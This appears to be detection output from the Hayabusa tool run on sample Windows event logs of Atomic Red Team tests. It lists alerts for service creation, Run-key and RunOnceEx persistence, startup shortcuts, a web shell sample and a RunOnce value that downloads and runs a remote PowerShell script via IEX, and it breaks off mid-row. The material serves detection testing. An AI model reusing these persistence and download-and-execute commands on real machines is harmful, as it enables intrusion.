file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | 
PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: 
SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: 
SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" 
""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 
+09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 
747F3D96-D772-5D31-0000-001083ED2800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 
747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,../hayabusa-rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,../hayabusa-rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library 
C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 